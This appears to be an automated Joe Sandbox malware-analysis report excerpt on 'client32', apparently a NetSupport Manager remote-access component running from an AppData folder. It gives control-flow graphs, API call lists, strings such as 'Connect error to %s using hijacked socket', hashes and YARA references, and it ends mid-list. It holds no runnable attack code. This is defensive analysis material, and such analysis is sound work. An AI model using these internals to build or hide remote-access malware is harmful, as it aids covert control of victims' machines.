                                                                              control_flow_graph 1050 6ef07030-6ef07050 call 6eef2a90 call 6ef0dbd0 1055 6ef07052-6ef07095 LoadLibraryA 1050->1055 1056 6ef07097 1050->1056 1057 6ef07099-6ef070f8 call 6eef8d00 InitializeCriticalSection CreateEventA 1055->1057 1056->1057 1060 6ef07111-6ef0711e CreateEventA 1057->1060 1061 6ef070fa-6ef0710e call 6eef6f50 1057->1061 1063 6ef07120-6ef07134 call 6eef6f50 1060->1063 1064 6ef07137-6ef07144 CreateEventA 1060->1064 1061->1060 1063->1064 1065 6ef07146-6ef0715a call 6eef6f50 1064->1065 1066 6ef0715d-6ef07170 WSAStartup 1064->1066 1065->1066 1071 6ef07172-6ef07182 call 6eef5290 call 6eef2b70 1066->1071 1072 6ef07183-6ef071b2 call 6ef11b69 1066->1072 1079 6ef071d0-6ef071e4 call 6ef11c50 1072->1079 1080 6ef071b4-6ef071cd call 6eef6f50 1072->1080 1086 6ef071e6-6ef071e9 1079->1086 1087 6ef071fa-6ef07202 1079->1087 1080->1079 1086->1087 1088 6ef071eb-6ef071f1 1086->1088 1089 6ef07204 1087->1089 1090 6ef07209-6ef07223 call 6ef13753 1087->1090 1088->1087 1091 6ef071f3-6ef071f8 1088->1091 1089->1090 1094 6ef07225-6ef07239 call 6eef6f50 1090->1094 1095 6ef0723c-6ef07255 call 6ef09bf0 1090->1095 1091->1090 1094->1095 1100 6ef07257-6ef0725e 1095->1100 1101 6ef0726a-6ef07271 call 6eef5730 1095->1101 1102 6ef07260-6ef07268 1100->1102 1105 6ef07277-6ef0729a call 6ef11b69 1101->1105 1106 6ef0730b-6ef07310 1101->1106 1102->1101 1102->1102 1114 6ef0729c-6ef072bb call 6eef6f50 1105->1114 1115 6ef072be-6ef072dc call 6ef11c50 call 6ef11b69 1105->1115 1107 6ef07312-6ef07315 1106->1107 1108 6ef0731e-6ef07336 call 6eef5e90 call 6eef5530 1106->1108 1107->1108 1111 6ef07317-6ef0731c 1107->1111 1113 6ef07339-6ef07354 call 6eef5e90 1108->1113 1111->1108 1111->1113 1126 6ef07361-6ef0738b GetTickCount CreateThread 1113->1126 1127 6ef07356-6ef0735c 1113->1127 1114->1115 1131 6ef072fa-6ef07308 call 6ef11c50 1115->1131 1132 6ef072de-6ef072f7 call 6eef6f50 1115->1132 1129 6ef073a9-6ef073b6 SetThreadPriority 1126->1129 1130 6ef0738d-6ef073a6 call 6eef6f50 1126->1130 1127->1126 1134 6ef073b8-6ef073cc call 6eef6f50 1129->1134 1135 6ef073cf-6ef073ed call 6eef5f20 call 6eef5e90 1129->1135 1130->1129 1131->1106 1132->1131 1134->1135 1147 6ef073f5-6ef073f7 1135->1147 1148 6ef073ef 1135->1148 1149 6ef07425-6ef07447 GetModuleFileNameA call 6eef2420 1147->1149 1150 6ef073f9-6ef07407 call 6ef0dbd0 1147->1150 1148->1147 1157 6ef07449-6ef0744a 1149->1157 1158 6ef0744c 1149->1158 1155 6ef07409-6ef0741c call 6eef4580 1150->1155 1156 6ef0741e 1150->1156 1161 6ef07420 1155->1161 1156->1161 1159 6ef07451-6ef0746d 1157->1159 1158->1159 1162 6ef07470-6ef0747f 1159->1162 1161->1149 1162->1162 1164 6ef07481-6ef07486 1162->1164 1165 6ef07487-6ef0748d 1164->1165 1165->1165 1166 6ef0748f-6ef074c8 GetPrivateProfileIntA GetModuleHandleA 1165->1166 1167 6ef07563-6ef0758f CreateMutexA timeBeginPeriod 1166->1167 1168 6ef074ce-6ef074fa call 6eef5e90 * 2 1166->1168 1173 6ef07536-6ef0755d call 6eef5e90 * 2 1168->1173 1174 6ef074fc-6ef07511 call 6eef5e90 1168->1174 1173->1167 1180 6ef07513-6ef07528 call 6eef5e90 1174->1180 1181 6ef0752a-6ef07530 1174->1181 1180->1173 1180->1181 1181->1173
                                                                              APIs
                                                                                • Part of subcall function 6EEF2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6EEF2ACB
                                                                                • Part of subcall function 6EEF2A90: _strrchr.LIBCMT ref: 6EEF2ADA
                                                                                • Part of subcall function 6EEF2A90: _strrchr.LIBCMT ref: 6EEF2AEA
                                                                                • Part of subcall function 6EEF2A90: wsprintfA.USER32 ref: 6EEF2B05
                                                                                • Part of subcall function 6EF0DBD0: _malloc.LIBCMT ref: 6EF0DBE9
                                                                                • Part of subcall function 6EF0DBD0: wsprintfA.USER32 ref: 6EF0DC04
                                                                                • Part of subcall function 6EF0DBD0: _memset.LIBCMT ref: 6EF0DC27
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6EF07057
                                                                              • InitializeCriticalSection.KERNEL32(6EF3B898), ref: 6EF070DF
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF070EF
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF07115
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6EF0713B
                                                                              • WSAStartup.WSOCK32(00000101,6EF3B91A), ref: 6EF07167
                                                                              • _malloc.LIBCMT ref: 6EF071A3
                                                                                • Part of subcall function 6EF11B69: __FF_MSGBANNER.LIBCMT ref: 6EF11B82
                                                                                • Part of subcall function 6EF11B69: __NMSG_WRITE.LIBCMT ref: 6EF11B89
                                                                                • Part of subcall function 6EF11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6EF1D3C1,6EF16E81,00000001,6EF16E81,?,6EF1F447,00000018,6EF37738,0000000C,6EF1F4D7), ref: 6EF11BAE
                                                                              • _memset.LIBCMT ref: 6EF071D3
                                                                              • _calloc.LIBCMT ref: 6EF07214
                                                                              • _malloc.LIBCMT ref: 6EF0728B
                                                                              • _memset.LIBCMT ref: 6EF072C1
                                                                              • _malloc.LIBCMT ref: 6EF072CD
                                                                              • _memset.LIBCMT ref: 6EF07303
                                                                              • GetTickCount.KERNEL32 ref: 6EF07361
                                                                              • CreateThread.KERNEL32(00000000,00004000,6EF06BA0,00000000,00000000,6EF3BACC), ref: 6EF0737E
                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6EF073AC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\,00000104), ref: 6EF07430
                                                                              • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\pci.ini), ref: 6EF074B0
                                                                              • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6EF074C0
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6EF07566
                                                                              • timeBeginPeriod.WINMM(00000001), ref: 6EF07573
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                              • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$134349$C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\$C:\Users\user\AppData\Roaming\QCHBWPB-9\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                              • API String ID: 3160247386-1963545668
                                                                              • Opcode ID: 14814a2392b13393e2a1c5c8315523fa979db56edb60b860c33db9caafd224f6
                                                                              • Instruction ID: 4e4e9bb2bd1dedcbbb552c90a55cc617cafbc9051442245c50193939e94f7570
                                                                              • Opcode Fuzzy Hash: 14814a2392b13393e2a1c5c8315523fa979db56edb60b860c33db9caafd224f6
                                                                              • Instruction Fuzzy Hash: 91D10EB19107259FEB20AFF49CB4B567B9DEF05348B14486AF809DB381E7729C458BE0
                                                                              Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              • _fgets.LIBCMT ref: 110628E2
                                                                              • _strpbrk.LIBCMT ref: 11062949
                                                                              • _fgets.LIBCMT ref: 11062A4C
                                                                              • _strpbrk.LIBCMT ref: 11062AC3
                                                                              • __wcstoui64.LIBCMT ref: 11062ADC
                                                                              • _fgets.LIBCMT ref: 11062B55
                                                                              • _strpbrk.LIBCMT ref: 11062B7B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                              • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                              • API String ID: 716802716-1571441106
                                                                              • Opcode ID: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                              • Opcode Fuzzy Hash: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                              Function 6EEFA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1993 6eefa980-6eefa9e7 call 6eef5840 1996 6eefa9ed-6eefa9f0 1993->1996 1997 6eefaa9c 1993->1997 1996->1997 1999 6eefa9f6-6eefa9fb 1996->1999 1998 6eefaaa2-6eefaaae 1997->1998 2000 6eefaac6-6eefaacd 1998->2000 2001 6eefaab0-6eefaac5 call 6ef128e1 1998->2001 1999->1997 2002 6eefaa01-6eefaa06 1999->2002 2005 6eefaacf-6eefaad7 2000->2005 2006 6eefab48-6eefab58 socket 2000->2006 2002->1997 2004 6eefaa0c-6eefaa21 EnterCriticalSection 2002->2004 2010 6eefaa89-6eefaa9a LeaveCriticalSection 2004->2010 2011 6eefaa23-6eefaa2b 2004->2011 2005->2006 2012 6eefaad9-6eefaadc 2005->2012 2007 6eefab5a-6eefab6f WSAGetLastError call 6ef128e1 2006->2007 2008 6eefab70-6eefabc9 #21 * 2 call 6eef5e90 2006->2008 2023 6eefabcb-6eefabe3 #21 2008->2023 2024 6eefabe8-6eefac1f bind 2008->2024 2010->1998 2015 6eefaa30-6eefaa39 2011->2015 2012->2006 2016 6eefaade-6eefab05 call 6eefa5c0 2012->2016 2019 6eefaa3b-6eefaa3f 2015->2019 2020 6eefaa49-6eefaa51 2015->2020 2027 6eefab0b-6eefab2f WSAGetLastError call 6eef30a0 2016->2027 2028 6eefad4a-6eefad69 EnterCriticalSection 2016->2028 2019->2020 2025 6eefaa41-6eefaa47 2019->2025 2020->2015 2022 6eefaa53-6eefaa5e LeaveCriticalSection 2020->2022 2022->1998 2023->2024 2029 6eefac41-6eefac49 2024->2029 2030 6eefac21-6eefac40 WSAGetLastError closesocket call 6ef128e1 2024->2030 2025->2020 2031 6eefaa60-6eefaa88 LeaveCriticalSection call 6ef128e1 2025->2031 2043 6eefae82-6eefae92 call 6ef128e1 2027->2043 2045 6eefab35-6eefab47 call 6ef128e1 2027->2045 2037 6eefad6f-6eefad7d 2028->2037 2038 6eefae50-6eefae80 LeaveCriticalSection GetTickCount InterlockedExchange 2028->2038 2035 6eefac4b-6eefac57 2029->2035 2036 6eefac59-6eefac64 2029->2036 2042 6eefac65-6eefac83 htons WSASetBlockingHook call 6eef7610 2035->2042 2036->2042 2044 6eefad80-6eefad86 2037->2044 2038->2043 2051 6eefac88-6eefac8d 2042->2051 2048 6eefad88-6eefad90 2044->2048 2049 6eefad97-6eefae0f InitializeCriticalSection call 6eef8fb0 call 6ef10ef0 2044->2049 2048->2044 2053 6eefad92 2048->2053 2067 6eefae18-6eefae4b getsockname 2049->2067 2068 6eefae11 2049->2068 2057 6eefac8f-6eefacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6eef30a0 call 6ef128e1 2051->2057 2058 6eefacc6-6eefaccd 2051->2058 2053->2038 2061 6eefaccf-6eefacd6 2058->2061 2062 6eefad45 WSAUnhookBlockingHook 2058->2062 2061->2062 2065 6eefacd8-6eefacfb call 6eefa5c0 2061->2065 2062->2028 2065->2062 2072 6eefacfd-6eefad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6eef30a0 2065->2072 2067->2038 2068->2067 2072->2043 2075 6eefad32-6eefad44 call 6ef128e1 2072->2075
                                                                              APIs
                                                                                • Part of subcall function 6EEF5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,?,00000000,00000000), ref: 6EEFAA11
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA58
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA68
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAA94
                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6EEFAB0B
                                                                              • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB4E
                                                                              • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB5A
                                                                              • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAB8E
                                                                              • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFABB1
                                                                              • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFABE3
                                                                              • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC18
                                                                              • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC21
                                                                              • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC29
                                                                              • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC65
                                                                              • WSASetBlockingHook.WSOCK32(6EEF63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC76
                                                                              • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC8F
                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC96
                                                                              • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAC9C
                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFACFD
                                                                              • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD04
                                                                              • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD0A
                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD45
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEFAD4F
                                                                              • InitializeCriticalSection.KERNEL32(-6EF3CB4A), ref: 6EEFADE6
                                                                                • Part of subcall function 6EEF8FB0: _memset.LIBCMT ref: 6EEF8FE4
                                                                                • Part of subcall function 6EEF8FB0: getsockname.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF9005
                                                                              • getsockname.WSOCK32(00000000,?,?), ref: 6EEFAE4B
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898), ref: 6EEFAE60
                                                                              • GetTickCount.KERNEL32 ref: 6EEFAE6C
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFAE7A
                                                                              Strings
                                                                              • Connect error to %s using hijacked socket, error %d, xrefs: 6EEFAB17
                                                                              • *TcpNoDelay, xrefs: 6EEFABB8
                                                                              • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6EEFAD14
                                                                              • Cannot connect to gateway %s, error %d, xrefs: 6EEFACA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                              • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                              • API String ID: 692187944-2561115898
                                                                              • Opcode ID: 48f358338affb7377c58fee7ef996e0b1e4ef9d4e17d535d33d40eb1d10a47c5
                                                                              • Instruction ID: c0321103268a5a31a62279e54a193ec43184e812b4db6175e7e3b3a6f44e01ac
                                                                              • Opcode Fuzzy Hash: 48f358338affb7377c58fee7ef996e0b1e4ef9d4e17d535d33d40eb1d10a47c5
                                                                              • Instruction Fuzzy Hash: 3FE19171A14219DFDB14DFD4C890BDDB3B9EF49304F1045AAE90D9B280DB719A89CBA1
                                                                              Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2144 11139ed0-11139f05 2145 11139f12-11139f19 2144->2145 2146 11139f07-11139f0d GetCurrentThreadId 2144->2146 2147 11139f20-11139f3c call 11134830 call 11134310 2145->2147 2148 11139f1b call 11029950 2145->2148 2146->2145 2154 11139f42-11139f48 2147->2154 2155 1113a01b-1113a022 2147->2155 2148->2147 2158 1113a59a-1113a5b5 call 11162bb7 2154->2158 2159 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 2154->2159 2156 1113a0da-1113a0f0 2155->2156 2157 1113a028-1113a02f 2155->2157 2169 1113a0f6-1113a0fd 2156->2169 2170 1113a22f 2156->2170 2157->2156 2160 1113a035-1113a03c 2157->2160 2191 1113a011 2159->2191 2192 11139fb1-11139fb7 2159->2192 2160->2156 2164 1113a042-1113a051 FindWindowA 2160->2164 2164->2156 2168 1113a057-1113a05c IsWindowVisible 2164->2168 2168->2156 2172 1113a05e-1113a065 2168->2172 2173 1113a0ff-1113a109 2169->2173 2174 1113a10e-1113a12e call 1105e820 2169->2174 2175 1113a231-1113a242 2170->2175 2176 1113a275-1113a280 2170->2176 2172->2156 2178 1113a067-1113a08c call 11139a70 IsWindowVisible 2172->2178 2173->2176 2174->2176 2197 1113a134-1113a163 2174->2197 2180 1113a244-1113a254 2175->2180 2181 1113a25a-1113a26f 2175->2181 2182 1113a282-1113a2a2 call 1105e820 2176->2182 2183 1113a2b6-1113a2bc 2176->2183 2178->2156 2203 1113a08e-1113a09d IsIconic 2178->2203 2180->2181 2181->2176 2199 1113a2b0 2182->2199 2200 1113a2a4-1113a2ae call 1102d750 2182->2200 2186 1113a2be-1113a2ca call 11139a70 2183->2186 2187 1113a2cd-1113a2d5 2183->2187 2186->2187 2195 1113a2e7 2187->2195 2196 1113a2d7-1113a2e2 call 1106c340 2187->2196 2191->2155 2192->2191 2201 11139fb9-11139fd0 call 11147060 GetForegroundWindow 2192->2201 2205 1113a2e7 call 1112ddd0 2195->2205 2196->2195 2216 1113a165-1113a179 call 11081d30 2197->2216 2217 1113a17e-1113a191 call 11143e00 2197->2217 2199->2183 2200->2183 2223 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 2201->2223 2224 11139ffe-1113a000 2201->2224 2203->2156 2208 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 2203->2208 2210 1113a2ec-1113a2f2 2205->2210 2245 1113a0cb-1113a0d4 EnableWindow 2208->2245 2246 1113a0bc-1113a0c2 2208->2246 2211 1113a2f4-1113a2fa call 11132a10 2210->2211 2212 1113a2fd-1113a306 2210->2212 2211->2212 2220 1113a314 call 111326b0 2212->2220 2221 1113a308-1113a30b 2212->2221 2216->2217 2237 1113a17b 2216->2237 2239 1113a193-1113a1a4 GetLastError call 11147060 2217->2239 2240 1113a1ae-1113a1b5 2217->2240 2228 1113a319-1113a31f 2220->2228 2221->2228 2229 1113a30d-1113a312 call 11132780 2221->2229 2223->2224 2224->2191 2233 1113a002-1113a008 2224->2233 2241 1113a325-1113a32b 2228->2241 2242 1113a429-1113a434 call 11139600 2228->2242 2229->2228 2233->2191 2235 1113a00a-1113a00b SetForegroundWindow 2233->2235 2235->2191 2237->2217 2239->2240 2249 1113a1b7-1113a1d2 2240->2249 2250 1113a228 2240->2250 2251 1113a331-1113a339 2241->2251 2252 1113a3db-1113a3e3 2241->2252 2260 1113a436-1113a448 call 110642e0 2242->2260 2261 1113a455-1113a45b 2242->2261 2245->2156 2246->2245 2255 1113a0c4-1113a0c5 SetForegroundWindow 2246->2255 2263 1113a1d5-1113a1e1 2249->2263 2250->2170 2251->2242 2258 1113a33f-1113a345 2251->2258 2252->2242 2256 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 2252->2256 2255->2245 2256->2242 2258->2242 2264 1113a34b-1113a362 call 111101b0 2258->2264 2260->2261 2281 1113a44a-1113a450 call 11142d90 2260->2281 2267 1113a461-1113a468 2261->2267 2268 1113a58a-1113a592 2261->2268 2269 1113a1e3-1113a1f7 call 11081d30 2263->2269 2270 1113a1fc-1113a209 call 11143e00 2263->2270 2278 1113a384 2264->2278 2279 1113a364-1113a382 call 11057eb0 2264->2279 2267->2268 2276 1113a46e-1113a487 call 1105e820 2267->2276 2268->2158 2269->2270 2285 1113a1f9 2269->2285 2270->2250 2287 1113a20b-1113a226 GetLastError call 11147060 2270->2287 2276->2268 2296 1113a48d-1113a4a0 2276->2296 2288 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 2278->2288 2279->2288 2281->2261 2285->2270 2287->2176 2288->2242 2323 1113a3d4-1113a3d9 call 110ec320 2288->2323 2305 1113a4a2-1113a4a8 2296->2305 2306 1113a4cd-1113a4d3 2296->2306 2307 1113a4aa-1113a4c8 call 11147060 GetTickCount 2305->2307 2308 1113a4d9-1113a4e5 GetTickCount 2305->2308 2306->2268 2306->2308 2307->2268 2308->2268 2312 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 2308->2312 2330 1113a530-1113a535 2312->2330 2323->2242 2330->2330 2331 1113a537-1113a53d 2330->2331 2332 1113a540-1113a545 2331->2332 2332->2332 2333 1113a547-1113a571 call 1112d6e0 2332->2333 2336 1113a573-1113a574 FreeLibrary 2333->2336 2337 1113a57a-1113a587 call 11162777 2333->2337 2336->2337 2337->2268
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                              • IsWindow.USER32(00040414), ref: 11139F65
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139F73
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139FAB
                                                                              • GetForegroundWindow.USER32 ref: 11139FC6
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139FE0
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139FFC
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                              • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                              • IsWindowVisible.USER32(00040414), ref: 1113A088
                                                                              • IsIconic.USER32(00040414), ref: 1113A095
                                                                              • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 1113A0D4
                                                                              • GetLastError.KERNEL32 ref: 1113A193
                                                                              • GetLastError.KERNEL32 ref: 1113A20B
                                                                              • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                              • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                              • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
